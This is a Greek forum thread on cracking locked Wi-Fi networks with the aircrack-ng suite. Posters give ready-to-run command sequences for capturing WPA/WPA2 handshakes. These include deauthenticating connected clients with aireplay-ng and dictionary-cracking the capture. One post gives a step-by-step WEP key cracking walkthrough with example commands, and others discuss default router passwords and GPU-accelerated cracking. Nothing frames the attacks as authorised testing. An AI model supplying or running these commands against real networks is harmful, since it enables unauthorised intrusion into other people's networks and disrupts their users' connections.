Προς το περιεχόμενο

"Σπάζοντας" κλειδωμένα ασύρματα δίκτυα


drkameleon

Προτεινόμενες αναρτήσεις

 

airmon-ng
 
airmon-ng start wlan0
 
clear
 
airodump-ng mon0
 
airodump-ng -w WPACap -c (opoio kanali einai) mon0
 
''NEW CONSOLE''
 
aireplay-ng -0 0 -a (router mac) -c (client mac) mon0
 
''NEW CONSOLE''
 
aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst WPACap-01.cap
 
                      '''PARADEIGMA PROORISMOU'''
 
 
ειναι για wpa+wpa2....το password.lst ειναι ενα παραδειγμα μπορεις να βαλεις και αλλες λιστες αν διαθετεις απλα δυσκολα εως αδυνατο να εχεις αποτελεσματα...να ξερεις

 

Aπλα, πρεπει ο κωδικος να ειναι στην λιστα, (αλλιως τα παρατας)  η αν εχει ενεργοποιησει το wps, oποτε χρειαζετε διαφορετικες εντολες.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

H μονο περίπτωση να βρείς WPA password σε πραγματικές συνθήκες είναι να έχει αφήσει τον default password που συνήθως είναι Alphanumeric 10 ψηφίων.

 

Το password list για alphanumeric είναι κάπου 20gb οποτε δεν ξέρω ποσο γρήγορα θα κανεις parse 20gb.

  • Like 1
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δημοσ. (επεξεργασμένο)

H μονο περίπτωση να βρείς WPA password σε πραγματικές συνθήκες είναι να έχει αφήσει τον default password που συνήθως είναι Alphanumeric 10 ψηφίων.

 

Το password list για alphanumeric είναι κάπου 20gb οποτε δεν ξέρω ποσο γρήγορα θα κανεις parse 20gb.

η λιστα με τα default password που λες,ξερεις που μπορω να την βρω???

Επεξ/σία από Evoliasmenos
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Καλά, κάθεστε και δίνετε γενικευμένες εντολές, ενώ κάθε περίπτωση είναι ξεχωριστή; Θα ακολουθήσουν άλλα 200 posts που θα ρωτάνε "εμένα γιατί δε μου δουλεύει;".

Όλα αυτά υπάρχουν στο wiki της aircrack suite : http://www.aircrack-ng.org/doku.php?id=tutorial&DokuWiki=ddb6d83ee1e71a77eaef63f704c49058 όπου αναλύονται όλοι οι τρόποι επίθεσης και ποιές εντολές χρησιμοποιούνται.

 

 

Mάθε πρώτα το WEP άμα δεν το εxεις μάθει ήδη και μετά πας στο WPA με την σειρά πάνε αυτά
 

 

 

Δεν πάνε με τη σειρά, άλλη προσέγγιση χρειάζεται το WEP (AP association, packet replay/injection, IV generation) και ουσιαστικά η επίθεση γίνεται στα IVs (initialization vectors) - ανάλογα και με την τεχνική, και άλλη το WPA (client dis-association, WPA handshake capture και μετά εφαρμόζεις brute force/dictionary/rainbow table attack).

 

Είπαμε, κάθε περίπτωση είναι ξεχωριστή και θέλει ανάλογη μέθοδο.

  • Like 1
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Καλά, κάθεστε και δίνετε γενικευμένες εντολές, ενώ κάθε περίπτωση είναι ξεχωριστή; Θα ακολουθήσουν άλλα 200 posts που θα ρωτάνε "εμένα γιατί δε μου δουλεύει;".

Όλα αυτά υπάρχουν στο wiki της aircrack suite : http://www.aircrack-ng.org/doku.php?id=tutorial&DokuWiki=ddb6d83ee1e71a77eaef63f704c49058 όπου αναλύονται όλοι οι τρόποι επίθεσης και ποιές εντολές χρησιμοποιούνται.

 

 

 

 

Δεν πάνε με τη σειρά, άλλη προσέγγιση χρειάζεται το WEP (AP association, packet replay/injection, IV generation) και ουσιαστικά η επίθεση γίνεται στα IVs (initialization vectors) - ανάλογα και με την τεχνική, και άλλη το WPA (client dis-association, WPA handshake capture και μετά εφαρμόζεις brute force/dictionary/rainbow table attack).

 

Είπαμε, κάθε περίπτωση είναι ξεχωριστή και θέλει ανάλογη μέθοδο.

δεν ειναι γενικευμενες...ειναι δουλεμενες και αξιοπιστες...ενταξει αν υπαρχει με wps κτλ υπαρχουν και αλλες μεθοδοι η extra κινησεις/εντολες κτλ...απλα μπορει ευκολα να το χρησιμοποιησει,γι'αυτο το ποσταρα...

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

δεν ειναι γενικευμενες...ειναι δουλεμενες και αξιοπιστες...ενταξει αν υπαρχει με wps κτλ υπαρχουν και αλλες μεθοδοι η extra κινησεις/εντολες κτλ...απλα μπορει ευκολα να το χρησιμοποιησει,γι'αυτο το ποσταρα...

 

 

Δουλεμένες και αξιόπιστες για ποιά περίπτωση;

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Καλά, κάθεστε και δίνετε γενικευμένες εντολές, ενώ κάθε περίπτωση είναι ξεχωριστή; Θα ακολουθήσουν άλλα 200 posts που θα ρωτάνε "εμένα γιατί δε μου δουλεύει;".

Όλα αυτά υπάρχουν στο wiki της aircrack suite : http://www.aircrack-ng.org/doku.php?id=tutorial&DokuWiki=ddb6d83ee1e71a77eaef63f704c49058 όπου αναλύονται όλοι οι τρόποι επίθεσης και ποιές εντολές χρησιμοποιούνται.

 

 

 

 

Δεν πάνε με τη σειρά, άλλη προσέγγιση χρειάζεται το WEP (AP association, packet replay/injection, IV generation) και ουσιαστικά η επίθεση γίνεται στα IVs (initialization vectors) - ανάλογα και με την τεχνική, και άλλη το WPA (client dis-association, WPA handshake capture και μετά εφαρμόζεις brute force/dictionary/rainbow table attack).

 

Είπαμε, κάθε περίπτωση είναι ξεχωριστή και θέλει ανάλογη μέθοδο.

 

 

 

 

 

Aυτό που ειπωθείτε πριν δεν είναι κάτι γενικό:

 

* Πρώτα κλεινεις το interface σου

 

* Μετά το βάζεις σε monitor mode

 

* Μετά κανεις scan

 

* Μετά παίρνεις το Handshake

 

* και επείτα υπάρχουν ένα σωρό προγράμματα για να κανεις απόπειρα να το σπάσεις.

 

 

Προφανώς πρέπει να μάθεις πρώτα το WEP έχουν διαφορετική διαδικασία ναι αλλα πρώτα μαθαίνεις να μπούσουλας και μετά περπατάς. Πως θα πας να σπάσεις το WPA άμα δεν εxεις καταφέρεις να σπάσεις επιτυχώς WEP.

 

Αυτό που σε πείραξε μάλλον είναι πως γράφτηκε κώδικας εδώ και θα τον μάθουν και άλλοι κάτι που για κάποιο λόγο δεν θες

 

 

 

 

 

 

 

 

 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Προφανώς πρέπει να μάθεις πρώτα το WEP έχουν διαφορετική διαδικασία ναι αλλα πρώτα μαθαίνεις να μπούσουλας και μετά περπατάς. Πως θα πας να σπάσεις το WPA άμα δεν εxεις καταφέρεις να σπάσεις επιτυχώς WEP.

 

Αυτό που σε πείραξε μάλλον είναι πως γράφτηκε κώδικας εδώ και θα τον μάθουν και άλλοι κάτι που για κάποιο λόγο δεν θες

 

 

 

Το βρήκες Sherlock!! :D

sherlock-holmes.jpg

 

Ειδικά, αφότου έδωσα link στην επίσημη σελίδα με οδηγούς και κώδικα...

 

 

Προφανώς πρέπει να μάθεις πρώτα το WEP έχουν διαφορετική διαδικασία ναι αλλα πρώτα μαθαίνεις να μπούσουλας και μετά περπατάς. Πως θα πας να σπάσεις το WPA άμα δεν εxεις καταφέρεις να σπάσεις επιτυχώς WEP.

 

 

Έχουν διαφορετική διαδικασία, αλλά χρειάζεται το ένα για να κάνεις το άλλο...

ΠΩΣ ΓΚΕΝΕΝ ΑΤΟ;

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δημοσ. (επεξεργασμένο)
   blepoume jpeg1.  ( CONSOLE ANOIGMA)
 
 
 
Step 2 : Type the command shown below -
Command 1: ifconfig wlan0
Command 2: iwconfig wlan0
 
 
   vlepoume jpeg2.
 
 
 
Step 3: Put your Wifi adapter card on Monitor Mode 
Open a new konsole and enter the command shown below - 
Type the following command to put your card into Monitor mode .
Command : airmon-ng start (your interface)
Example : airmon-ng start wlan0
A message is also display on the screen that your monitor mode is enabled.
 
 
 
   vlepoume jpeg3.
 
 
Step 4: Display the monitor mode .
New monitor mode created named mon0 
To see the monitor mode enter the command shown below -
Command : iwconfig 
 
 
   
   vlepoume jpeg4.
 
 
Step 5: Finding a Target
Now we have to find the network that is protected by the WEP .
To find those networks we use a simple command shown below - 
Command : airodump-ng mon0 
Here airodump-ng is the command to start the program
mon0 is the new interface which you created in the earlier step .
 
 
 
   vlepoume jpeg5.
 
 
Step 6: Capture the data into file 
To capture the data we use airodump tool with additional switches like --bssid ( mac address), -c (channel), -w (filename )
Syntax of the commands is - 
Command : airodump-ng mon0 --bssid (Mac Address) -c (channel no.) -w (filename)
Example : airodump-ng mon0 --bssid 00:08:68:2F:C8:C8 -c 1 -w WEPkey
 
 
 
   vlepoume jpeg6.
 
 
Step 7: Open Home Directory to check WEPkey file is created or not .
Open the Home Directory .
Check your WEPkey file is created or not .
See the image below - Image shows WEPkey file is created and saved in the home 
 
 
   vlepoume jpeg7.
 
 
Step 8: Crack the WEP Key using Aircrack Tool 
Open a new konsole . 
Then enter the command  : aircrack-ng (file name)
Example : aircrack-ng WEPkey-01.cap
Withing  a minute aircrack will decrypt your WEP key as shown in the image .
 
   
   vlepoume jpeg8.


τα jpegs για wep......



+edit οτι οταν φτανεις στο σημειο που μαζευει πακετα μονο μια φορα αποκρυπτογραφησα κατι με 20000 πακετα (και λιγα παραπανω)...συνηθως η διαδικασια κατα 100% ειναι πετυχημενη οταν φτανεις απο 65000 πακετα εως 85000...

post-241639-0-54537500-1370616763_thumb.jpg

post-241639-0-97703000-1370616764_thumb.jpg

post-241639-0-42692600-1370616766_thumb.jpg

post-241639-0-16216600-1370616768_thumb.jpg

post-241639-0-18192400-1370616770_thumb.jpg

post-241639-0-66433600-1370616771_thumb.jpg

post-241639-0-73508000-1370616772_thumb.jpg

post-241639-0-56424500-1370616773_thumb.jpg

Επεξ/σία από Evoliasmenos
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Aυτό που ειπωθείτε πριν δεν είναι κάτι γενικό:

 

* Πρώτα κλεινεις το interface σου

 

* Μετά το βάζεις σε monitor mode

 

* Μετά κανεις scan

 

* Μετά παίρνεις το Handshake

 

* και επείτα υπάρχουν ένα σωρό προγράμματα για να κανεις απόπειρα να το σπάσεις.

 

 

Προφανώς πρέπει να μάθεις πρώτα το WEP έχουν διαφορετική διαδικασία ναι αλλα πρώτα μαθαίνεις να μπούσουλας και μετά περπατάς. Πως θα πας να σπάσεις το WPA άμα δεν εxεις καταφέρεις να σπάσεις επιτυχώς WEP.

 

Αυτό που σε πείραξε μάλλον είναι πως γράφτηκε κώδικας εδώ και θα τον μάθουν και άλλοι κάτι που για κάποιο λόγο δεν θες

 

 

 

 

 

 

 

 

 

Καλα, αμα κοιταξεις το youtube να φανε και οι κοτες. Αν σ' ενδιαφερει το ψαχνεις και απο μονος σου. Αν δε σ ενδιαφερει ομως. Ειναι το παραδειγμα με το κοκκινο στυλο που αναφερει και ο...αλλος. ;) 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Καλα, αμα κοιταξεις το youtube να φανε και οι κοτες. Αν σ' ενδιαφερει το ψαχνεις και απο μονος σου. Αν δε σ ενδιαφερει ομως. Ειναι το παραδειγμα με το κοκκινο στυλο που αναφερει και ο...αλλος. ;)

κοκκινο στυλο....???στο youtube αστο...βρισκεις 1 tutorial στα 5 που να λειτουργει κανονικα και σωστα,πρωτον οι μισοι προσπαθουν ειδικα για wpa/wpa2 να σπασουν το δικο τους κανωντας εισαγωγη το pass τους μεσα σε μια  π.χ [email protected] κτλ...κανωντας αυτους που τους ενδιαφερει να νομιζουν οτι ειναι πανευκολο... οπως και αλλα π.χ ενημερωσε αφου μιλας ρε ανθρωπε με μικροφωνο στο βιντεο για μονταζ σε στιγμες οπως στην εμφανιση handshake κτλ που σ'αυτους εμφανιζεται σε 2 με 3 δευτερολεπτα ενω δεν ειναι ετσι...αστο,καλη τυχη σε λεω   :ph34r:  

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Το βρήκες Sherlock!! :D

sherlock-holmes.jpg

 

Ειδικά, αφότου έδωσα link στην επίσημη σελίδα με οδηγούς και κώδικα...

 

 

 

Έχουν διαφορετική διαδικασία, αλλά χρειάζεται το ένα για να κάνεις το άλλο...

ΠΩΣ ΓΚΕΝΕΝ ΑΤΟ;

 

 

 

Έχουν διαφορετική διαδικασία, αλλά χρειάζεται το ένα για να κάνεις το άλλο...

ΠΩΣ ΓΚΕΝΕΝ ΑΤΟ;

 

Aρχίζεις πρώτα με δοκιμες σε κάτι εύκολο που είναι το WEP και έχει πολλές πιθανότητες να έχει επιτυχια και η διαδικασία δουλεύει σίγουρα άμα εχεις καλο σήμα και δεν είσαι πολύ μακριά από το ΑP.

 

Αφού απόκτησης πειρα στο backtrack, στο aircrack και στο CLI μετά πας στα πιο δύσκολα που είναι το WPA. Στο WPA θέλει και λίγο φαντασία τι θα κανεις με το Handshake αφού το παρεις. Ενώ η διαδικασία του να παρεις το Handshake είναι γνωστη το τι να κανεις το *.cap με το handshake θέλει γνώση και εμπειρία.

 

Tώρα όλα αυτά Candlemass δεν βοηθούνε πουθενά και γυρίζουμε πίσω την συζήτηση εδώ συζητούσαμε τι θα γίνει με το  *.cap file και πως θα το κάνουμε Decode γρήγορα σε real world καταστάσεις. Mιλαγαμε για GPU acceleration, computational clusters etc

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

κοκκινο στυλο....???στο youtube αστο...βρισκεις 1 tutorial στα 5 που να λειτουργει κανονικα και σωστα,πρωτον οι μισοι προσπαθουν ειδικα για wpa/wpa2 να σπασουν το δικο τους κανωντας εισαγωγη το pass τους μεσα σε μια  π.χ [email protected] κτλ...κανωντας αυτους που τους ενδιαφερει να νομιζουν οτι ειναι πανευκολο... οπως και αλλα π.χ ενημερωσε αφου μιλας ρε ανθρωπε με μικροφωνο στο βιντεο για μονταζ σε στιγμες οπως στην εμφανιση handshake κτλ που σ'αυτους εμφανιζεται σε 2 με 3 δευτερολεπτα ενω δεν ειναι ετσι...αστο,καλη τυχη σε λεω   :ph34r:  

Sυμφωνω απολυτως, απλα δειχνουν την διαδικασια, τα βηματα που πρεπει ν' ακολουθησεις.

  • Like 1
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Επισκέπτης
Αυτό το θέμα είναι πλέον κλειστό για περαιτέρω απαντήσεις.

  • Δημιουργία νέου...